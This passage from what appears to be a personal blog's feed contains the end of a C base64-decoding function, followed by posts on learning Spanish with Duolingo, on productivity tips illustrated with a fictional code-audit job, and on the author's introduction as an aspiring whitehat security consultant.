<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">decodedBuf</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="k">static</span><span class="w"> </span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">char</span><span class="w"></span>
<span class="nf">GetIndexByChar</span><span class="p">(</span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">c</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">i</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="p">(</span><span class="n">i</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"> </span><span class="n">i</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="mi">64</span><span class="p">;</span><span class="w"> </span><span class="n">i</span><span class="o">++</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">b64alphabet</span><span class="p">[</span><span class="n">i</span><span class="p">]</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">c</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="p">(</span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">char</span><span class="p">)</span><span class="n">i</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">100</span><span class="p">;</span><span class="w"> </span><span class="cm">/* indicates an error */</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>Short essay about my experiences on duolingo.com2012-10-08T13:26:00+02:002012-10-08T13:26:00+02:00Nikolai Tschachertag:incolumitas.com,2012-10-08:/2012/10/08/short-essay-about-my-experiences-on-duolingo-com/<p>Well, it has been a hell of a time since I updated my blog. Honestly, I
was kind of unmotivated doing anything on my VPS, but recently I solved
some old issues (setting up DNS server, general administration things on
my ubuntu 12.04) and I thought: Yeah, it's definitely time to feed my
countless readers (yeah, you just met the first time my irony) with new
interesting nibbles. And since I am a more or less motivated Spanish
student, I thought I could share my pros and cons with duolingo.com.</p>
<p>I started learning Spanish approximately 5 months ago, when I began my
spontaneous planned trip to Costa Rica. I was brutally thrown into (at
least compared to Europe) very poor country and took for 5 weeks Spanish
classes. Retrospectively, I'd say that I learned pretty quick how to
communicate and express myself, but I completly fucked up my
understanding of the language on the long term, because I learned it on
the incorrect way. Before I even understood what my discussion partner
intented to say and would have exposed me therefore in a silly but
perfectly normal situation when I requested the unknown word/sentence,
where I would …</p><p>Well, it has been a hell of a time since I updated my blog. Honestly, I
was kind of unmotivated doing anything on my VPS, but recently I solved
some old issues (setting up DNS server, general administration things on
my ubuntu 12.04) and I thought: Yeah, it's definitely time to feed my
countless readers (yeah, you just met the first time my irony) with new
interesting nibbles. And since I am a more or less motivated Spanish
student, I thought I could share my pros and cons with duolingo.com.</p>
<p>I started learning Spanish approximately 5 months ago, when I began my
spontaneous planned trip to Costa Rica. I was brutally thrown into (at
least compared to Europe) very poor country and took for 5 weeks Spanish
classes. Retrospectively, I'd say that I learned pretty quick how to
communicate and express myself, but I completly fucked up my
understanding of the language on the long term, because I learned it on
the incorrect way. Before I even understood what my discussion partner
intented to say and would have exposed me therefore in a silly but
perfectly normal situation when I requested the unknown word/sentence,
where I would need to reveal that I didn't understood, I just continued
chatting and babbled in incorrect Spanish, just to save the conversation
and my misplaced ego. Back in Europe, I realized that I need to build up
a solid fundament, before I dare myself to improve, so duolingo.com came
convenient.</p>
<p>First of all: Duolingo.com is absolutely addictive. You can gain skill
points to monitor your learning curve and you can even track other
learners to compare, which additionaly boosts your ambition. There are
lots of courses and you need roughly 3-5 months to complete the grammer
part, if you learn 100 points each day. I need normally around 45
minutes to gain my 100 points. Then every course consits of a
translation part, which states the initial purpose of the whole platform
and will bring light into your smouldering question: Why the hell offers
duolingo.com free high quality language curses, whereby other platforms
sometimes claim for an equivalent supply a great amount of money?</p>
<p>Well, the idea behind duolingo is, that the many hundred thousands
learners will translate documents. These documents could be blog entries
of a very successful internet platform in the english language area. But
now, the 500 million Spanish speaking people on this earth can't access
this obviously interesting information and therefore, a lot of potential
advertising consumers are just lost. The idea is, that the thousands of
learners translate these valuable information for to make them
accessible by other target groups. Duolingo.com plans to sell
translation services and I asume that out there in the wildlife, such a
service is sought. Now that we discussed the general concept behind
duolingo.com, how good can you effectively learn the foreign language?</p>
<p>In general, I strongly think that there is no such thing as a didactic
wondertool, which turns you into a native speaker in serveral weeks or
even months. You will adapt and understand a great deal of a language if
you all day long learn it, live it and you are completly surrounded by
it. This is the case if you make an abroad year on a foreign universtiy
for example. Then, if you are motivated and if you're extroverted,you'll
probably be fluent after 3 or 4 months. But if you learn 1 to 2 hours a
day on duolingo.com, you have a much harder path to follow. After 4
months of daily learning on duolingo, you have a nice vocabulary and a
idea of how the language works, but you don't really feel it and won't
have this verbal/emotional relationship towards the sound and feeling of
the culture/language itself. You'll be able to translate advanced
content into Spanish and you will most likely understand the idea behind
a Spanish book, but you can't really use the language in daily speech.
Duolingo replaces in my opinion the common schoolastic approach and
increases the fun level, but it can't teach you a language. There we
will need a different strategy: Learning in webcam lessons with foreign
people out there! I guess there are thousands of young folks out there
who want to learn your language and you want to learn their, so you can
exchange and learn from each other. Then, there wouldn't be any
hindrance to learn a language completly in the internet. An amazing
idea!</p>Success2012-07-23T01:09:00+02:002012-07-23T01:09:00+02:00Nikolai Tschachertag:incolumitas.com,2012-07-23:/2012/07/23/success/<p><em>Have you ever wanted to know some strategies and hints how to be more
successful in your daily work?</em></p>
<p>Well, here, i'll compile a list of thoughts and scenarios of effective working, which worked for me or
seems to be at least reasonable in my future working career.</p>
<p>To illustrate and give an example for every wisdom, we use the example
for a job assignment I could found myself in: The fictional job requires
the accomplishment of a security audit of the employers content
management system written in PHP. We have access to all sources,
although the project is proprietary and is under a restrictive license.</p>
<h3>1. Develop broad general knowledge.</h3>
<p>The curios reader would ask now, why the hell do we need a proper
general knowledge to scan a web application for programming errors which
might weaken its security? Well, before you begin reading every line of
code and do the formal, rather static part of your work, you'd better
square the context of your task with your general knowledge: Where do
the people, who wrote the application live at? Which language do the
speak? What does the company which runs the cms exactly offer?</p>
<h3>2. Work at least …</h3><p><em>Have you ever wanted to know some strategies and hints how to be more
successful in your daily work?</em></p>
<p>Well, here, i'll compile a list of thoughts and scenarios of effective working, which worked for me or
seems to be at least reasonable in my future working career.</p>
<p>To illustrate and give an example for every wisdom, we use the example
for a job assignment I could found myself in: The fictional job requires
the accomplishment of a security audit of the employers content
management system written in PHP. We have access to all sources,
although the project is proprietary and is under a restrictive license.</p>
<h3>1. Develop broad general knowledge.</h3>
<p>The curios reader would ask now, why the hell do we need a proper
general knowledge to scan a web application for programming errors which
might weaken its security? Well, before you begin reading every line of
code and do the formal, rather static part of your work, you'd better
square the context of your task with your general knowledge: Where do
the people, who wrote the application live at? Which language do the
speak? What does the company which runs the cms exactly offer?</p>
<h3>2. Work at least 25 minutes at a time</h3>
<p>Have you ever obsevered yourself working very unsteadily and you
constantly interrupt your working sessions? Well, this is very bad for
the quality of your work, since the amount you learned or did can be
calculated after common sense similar to something like the following:</p>
<p>Stuff_Done = Time * Concentration</p>
<p>If you work a lot, but you're concentration is weak because you brain
just does not have the time to accustom to your task, the efficiency of
your output will most likely suffer. Just force yourself to concentrate
you on your work. Do just the specific task, don't look up your emails,
go to the toilet or make yourself a coffee. No topic change or bigger
semantic gap should distort the session. Set up a alarm clock to
actually measure the time.</p>
<h3>3. Become an expert in few things</h3>
<p>This is very important for me and somehow contradictory to the first
rule.</p>
<p>In our modern times and since ever changing learning methods and
information processing improvements, there's still nothing who beats the
simple stubborn learning by heart way.<br>
You should know a few tools very good. I will for example try to master sooner or later the programming
language Python. It's a very abstract and huge scripting language with a
big standard library, but if you once just know the majority of the
build in functions and modules and you automatically use them, you
productivity will increase distinctively.<br>
Just imagine you want to make
a first rough scan of the source code of the CMS with a set of regexes
who match common security flaws: The best way would be to use grep or
egrep and code a simple bash script to accomplish the task, but what if
you first have to seek for a lot of meta information how to make a while
loop in bash, what the command line arguments in grep exactly mean and
which regex syntax grep requests and the like?<br>
Well, if you then use your good old Python knowledge, you exactly know how to pursue, although
it might not be that elegant and appropriate way to do. Using your old
and established toolset, you can focus on the task and won't get
distracted that fast.</p>
<h3>4. Don't fuck with yourself</h3>
<p>One of the worst motivation and workflow killers is yourself. Once you
decide to pursue a goal you should try with all power to reach it. There
are thousands of hindrances which make it hard and they sometimes seem
impossible to overcome, but the worst of all these obstacles is you
own ego:</p>
<p>Imagine you intended to create a simple guestbook with a specific
functionality and a handy design, but after a few weeks, due to your
stressful and busy time, the task becomes unimportant and you start to
spend your attention on other stuff.<br>
This is incorrect, because you betray yourself. Even if the intentional purpose of the idea might
change or the task itself is barely unreachable because of its
complexity, legality or significance, you should try hard to terminate
and finish the task. Nothing destroys more credibility and willpower to
start over with new projects, than a semi-finished, never ended task.
You self esteem will most likely suffer too, because you'll ask yourself
constantly: Am I beginning right now one of these never ending projects?</p>
<p>Best practice to prevent this behavior is to keep a diary, which tracks
the exact definition of the goals, the progress and other related notes
according the project. You should define a dead line and if it is
violated the project must definitively fail.</p>
<h3>3. Intrinsic motivation</h3>
<p>Wikipedia defines intrinisc motivation in the following way:</p>
<blockquote>
<p><strong>Intrinsic motivation</strong> refers to motivation that is driven by an
interest or enjoyment in the task itself, and exists within the
individual rather than relying on any external pressure.</p>
</blockquote>
<p>So, for every big project in your live, like the chosen direction of
your'e studies or profession, you just can succeed if you like doing it.
It might be possible to force yourself, but it's not the intention of
this post to offer a guide to torture yourself. First ask if you
principally like what you do, then do it right and in a correct way.</p>Let's begin this...2012-07-01T14:24:00+02:002012-07-01T14:24:00+02:00Nikolai Tschachertag:incolumitas.com,2012-07-01:/2012/07/01/lets-begin-this/<p>Hey World!</p>
<h3>Before you leave!</h3>
<p>This blog and homepage is under construction. Due the fact that Im
currently implementing my own little wordpress theme and the rather
embarassing circumstance that my design knowledge is pretty ...eehhm...
basic, you'd better stay patient until you see the procution level of
this blog...That can last several weeks.</p>
<p>I am a 21 year old german programmer and hopefully somewhen in the
future a freelancing security consultant. In the foreseable future, I'll
post here audit sessions, papers and tutorials on this blog. I would
consider myself as a whitehat, so don't expect illicit stuff from me. My
favourite programming languages are Python and C. Everything I do for
myself and can be painless done in those programming languages, will be
done in one of these.</p>
<p>Maybe you ask yourself what <strong>incolumitas.com</strong> means?</p>
<p>Well, it's the latin translation for <strong>safety</strong> and since every good
domain name is already taken, I just switched to a different language
(latin if you're curious) and a not so common word for safety. The DNS
name matches perfectly my needs, because it points directly to the main
intention of this site:</p>
<p><em>Offering security services.</em></p>
<p>You can hire me. Don't …</p><p>Hey World!</p>
<h3>Before you leave!</h3>
<p>This blog and homepage is under construction. Due the fact that Im
currently implementing my own little wordpress theme and the rather
embarassing circumstance that my design knowledge is pretty ...eehhm...
basic, you'd better stay patient until you see the procution level of
this blog...That can last several weeks.</p>
<p>I am a 21 year old german programmer and hopefully somewhen in the
future a freelancing security consultant. In the foreseable future, I'll
post here audit sessions, papers and tutorials on this blog. I would
consider myself as a whitehat, so don't expect illicit stuff from me. My
favourite programming languages are Python and C. Everything I do for
myself and can be painless done in those programming languages, will be
done in one of these.</p>
<p>Maybe you ask yourself what <strong>incolumitas.com</strong> means?</p>
<p>Well, it's the latin translation for <strong>safety</strong> and since every good
domain name is already taken, I just switched to a different language
(latin if you're curious) and a not so common word for safety. The DNS
name matches perfectly my needs, because it points directly to the main
intention of this site:</p>
<p><em>Offering security services.</em></p>
<p>You can hire me. Don't hesitate to ask me anything...</p>